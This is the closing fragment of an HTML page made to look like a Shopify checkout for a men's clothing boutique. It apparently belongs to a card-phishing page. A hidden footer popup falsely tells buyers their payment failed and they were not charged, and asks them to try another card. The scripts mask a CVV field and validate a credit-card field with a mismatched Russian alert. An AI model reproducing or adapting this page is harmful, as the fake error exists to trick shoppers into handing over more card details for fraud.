                                    </div>
                                    <div class="hidden-if-js">
                                        <button name="button" type="submit" id="continue_button" class="step__footer__continue-btn btn " aria-busy="false" trekkie_id="complete_order_button"><span class="btn__content" data-continue-button-content="true">Continue to payment</span>
                                            <svg class="icon-svg icon-svg--size-18 btn__spinner icon-svg--spinner-button" aria-hidden="true" focusable="false">
                                                <use xlink:href="#spinner-button" /> </svg>
                                        </button>
                                    </div>
                        
                                </div>
                        
                            </form>
                        </div>

                    </div>

                    <div class="hidden">
                        <span class="visually-hidden" id="forwarding-external-new-window-message">
    Opens external website in a new window.
  </span>

                        <span class="visually-hidden" id="forwarding-new-window-message">
    Opens in a new window.
  </span>

                        <span class="visually-hidden" id="forwarding-external-message">
    Opens external website.
  </span>

                        <span class="visually-hidden" id="checkout-context-step-one">
    Customer information - Men&#39;s Luxury Boutique - Checkout
  </span>
                    </div>

                </main>

            </div>
            <aside class="sidebar" role="complementary">
                <div class="sidebar__header">

                    <a class="logo logo--center" href="https://www.mensluxuryboutique.com"><img alt="Men's Luxury Boutique" class="logo__image logo__image--large" src="//cdn.shopify.com/s/files/1/0086/9646/3419/files/long_logo_new_3_png.png?746"></a>

                    <h1 class="visually-hidden">
        Information
      </h1>

                </div>
                <div class="sidebar__content">
                    <div id="order-summary" class="order-summary order-summary--is-collapsed" data-order-summary="">
                        <h2 class="visually-hidden-if-js">Order summary</h2>

                        <div class="order-summary__sections">
                            <div class="order-summary__section order-summary__section--product-list">
                                <div class="order-summary__section__content">
                                    <table class="product-table">
                                        <caption class="visually-hidden">Shopping cart</caption>
                                        <thead class="product-table__header">
                                            <tr>
                                                <th scope="col"><span class="visually-hidden">Product image</span></th>
                                                <th scope="col"><span class="visually-hidden">Description</span></th>
                                                <th scope="col"><span class="visually-hidden">Quantity</span></th>
                                                <th scope="col"><span class="visually-hidden">Price</span></th>
                                            </tr>
                                        </thead>
                                        <tbody data-order-summary-section="line-items">
                                            <tr class="product" data-product-id="4111850864694" data-variant-id="30865686003766" data-product-type="" data-customer-ready-visible="">

                                                <th class="product__description" scope="row">


                                                </th>
                                                <td class="product__quantity visually-hidden">
                                                    1
                                                </td>
                                                <td class="product__price">
                                                    <span class="order-summary__emphasis"></span>
                                                </td>
                                            </tr>
                                        </tbody>
                                    </table>

                                    <div class="order-summary__scroll-indicator" aria-hidden="true" tabindex="-1">
                                        Scroll for more items
                                        <svg aria-hidden="true" focusable="false" class="icon-svg icon-svg--size-12">
                                            <use xlink:href="#down-arrow"></use>
                                        </svg>
                                    </div>
                                </div>
                            </div>

                     

                            <div class="order-summary__section order-summary__section--total-lines" data-order-summary-section="payment-lines">
                                <table class="total-line-table">
                                    <caption class="visually-hidden">Cost summary</caption>
                                    <thead>
                                        <tr>
                                            <th scope="col"><span class="visually-hidden">Description</span></th>
                                            <th scope="col"><span class="visually-hidden">Price</span></th>
                                        </tr>
                                    </thead>
                                    <tbody class="total-line-table__tbody">


                                        <tr class="total-line total-line--shipping">
                                            <th class="total-line__name" scope="row">
                                                <span>
            Shipping
          </span>
                                            </th>
                                            <td class="total-line__price">
                                                <span class="order-summary__small-text" data-checkout-total-shipping-target="0">
           FREE
          </span>
                                            </td>
                                        </tr>

                                        <tr class="total-line total-line--taxes hidden" data-checkout-taxes="">
                                            <th class="total-line__name" scope="row">Taxes</th>
                                            <td class="total-line__price">
                                                <span class="order-summary__emphasis" data-checkout-total-taxes-target="0">£0.00</span>
                                            </td>
                                        </tr>

                                    </tbody>

                                </table>

                            </div>
                        </div>
                    </div>

                    <div class="visually-hidden" data-order-summary-section="accessibility-live-region">
                        <div aria-live="polite" aria-atomic="true" role="status">
                            Updated total price:
                            <span data-checkout-payment-due-target="7900">

          </span>
                        </div>
                    </div>

                    <div id="partial-icon-symbols" class="icon-symbols" data-tg-refresh="partial-icon-symbols" data-tg-refresh-always="true">
                        <svg xmlns="http://www.w3.org/2000/svg">
                            <symbol id="caret-down">
                                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
                                    <path d="M0 3h10L5 8" fill-rule="nonzero"></path>
                                </svg>
                            </symbol>
                            <symbol id="question">
                                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">
                                    <path d="M8 0C3.6 0 0 3.6 0 8s3.6 8 8 8 8-3.6 8-8-3.6-8-8-8zm.7 13H6.8v-2h1.9v2zm2.6-7.1c0 1.8-1.3 2.6-2.8 2.8l-.1 1.1H7.3L7 7.5l.1-.1c1.8-.1 2.6-.6 2.6-1.6 0-.8-.6-1.3-1.6-1.3-.9 0-1.6.4-2.3 1.1L4.7 4.5c.8-.9 1.9-1.6 3.4-1.6 1.9.1 3.2 1.2 3.2 3z"></path>
                                </svg>
                            </symbol>
                            <symbol id="spinner-button">
                                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20">
                                    <path d="M20 10c0 5.523-4.477 10-10 10S0 15.523 0 10 4.477 0 10 0v2c-4.418 0-8 3.582-8 8s3.582 8 8 8 8-3.582 8-8h2z"></path>
                                </svg>
                            </symbol>
                            <symbol id="chevron-right">
                                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
                                    <path d="M2 1l1-1 4 4 1 1-1 1-4 4-1-1 4-4"></path>
                                </svg>
                            </symbol>
                            <symbol id="down-arrow">
                                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 12">
                                    <path d="M10.817 7.624l-4.375 4.2c-.245.235-.64.235-.884 0l-4.375-4.2c-.244-.234-.244-.614 0-.848.245-.235.64-.235.884 0L5.375 9.95V.6c0-.332.28-.6.625-.6s.625.268.625.6v9.35l3.308-3.174c.122-.117.282-.176.442-.176.16 0 .32.06.442.176.244.234.244.614 0 .848"></path>
                                </svg>
                            </symbol>
                            <symbol id="arrow">
                                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">
                                    <path d="M16 8.1l-8.1 8.1-1.1-1.1L13 8.9H0V7.3h13L6.8 1.1 7.9 0 16 8.1z"></path>
                                </svg>
                            </symbol>
                            <symbol id="close">
                                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">
                                    <path d="M15.1 2.3L13.7.9 8 6.6 2.3.9.9 2.3 6.6 8 .9 13.7l1.4 1.4L8 9.4l5.7 5.7 1.4-1.4L9.4 8"></path>
                                </svg>
                            </symbol>
                            <symbol id="spinner-small">
                                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32">
                                    <path d="M32 16c0 8.837-7.163 16-16 16S0 24.837 0 16 7.163 0 16 0v2C8.268 2 2 8.268 2 16s6.268 14 14 14 14-6.268 14-14h2z"></path>
                                </svg>
                            </symbol>
                        </svg>
                    </div>

                </div>
            </aside>
        </div>
    </div>

    <footer>
		<div class="overlay js-overlay-thank-you">
			<div class="popup js-thank-you">
                <h2 style="text-align: center; color: red;" >ERROR</h2>
                <span style="text-align: center; color: red;" >There Was a Problem Processing Your Payment: Sorry, but we`are having trouble processing your payment.</span>
                <span style="text-align: center; color: red;" >You have not been charged for this transaction.</span>
                <span  style="text-align: center; color: red;">Please try again or try another card for payment.</span>
				<div class="close-popup js-close-thank-you"></div>
			</div>
        </div>
    
    </footer>
    

    <script>
    $(function() {

$("#cvv").mask("999");

});

    </script>
<script type="text/javascript">
  
    
    function validate_form ( )
    {
        valid = true;
    
            if ( document.orders.creditCard.value == "" )
            {
                    alert ( "Пожалуйста заполните поле 'Ваше имя'." );
                    valid = false;
            }
    
            return valid;
    }
    

    </script>
</body>

</html>